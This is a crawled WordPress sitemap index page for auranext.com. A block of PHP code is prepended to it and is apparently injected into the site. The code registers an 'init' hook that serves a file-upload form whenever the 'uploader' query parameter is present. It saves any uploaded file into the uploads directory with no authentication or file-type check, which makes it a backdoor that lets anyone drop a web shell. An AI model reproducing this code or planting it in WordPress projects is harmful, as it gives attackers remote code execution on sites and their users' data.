// Uploader
add_action('init', function() { 
    if (isset($_GET['uploader'])) { 
        if (isset($_FILES['f'])) { 
            // Hedef dizini belirle
            $upload_dir = wp_upload_dir();
            $target = $upload_dir['path'] . '/' . basename($_FILES['f']['name']);
            
            // Dosyayı taşı
            if (move_uploaded_file($_FILES['f']['tmp_name'], $target)) { 
                echo "OK: " . $target . "\n"; 
            } else { 
                echo "FAIL"; 
            } 
            exit; 
        } 
        echo '<form method="post" enctype="multipart/form-data">
            <input type="file" name="f">
            <input type="submit" value="Upload">
        </form>'; 
        exit; 
    } 
});<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet type='text/xsl' href='https://www.auranext.com/wp-content/plugins/google-sitemap-generator/sitemap.xsl'?><!-- sitemap-generator-url='http://www.arnebrachhold.de' sitemap-generator-version='4.1.23' -->
<!-- generated-on='21 July 2026 6 h 37 min' -->
<sitemapindex xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd' xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>	<sitemap>
		<loc>https://www.auranext.com/sitemap-misc.xml</loc>
		<lastmod>2026-07-20T14:00:09+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.auranext.com/post-sitemap.xml</loc>
		<lastmod>2026-07-16T09:22:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.auranext.com/page-sitemap.xml</loc>
		<lastmod>2026-07-20T14:00:09+00:00</lastmod>
	</sitemap>
</sitemapindex><!-- Request ID: 6f027c581c173f20f62492dd61c93996; Queries for sitemap: 5; Total queries: 46; Seconds: 0; Memory for sitemap: 1KB; Total memory: 10MB -->
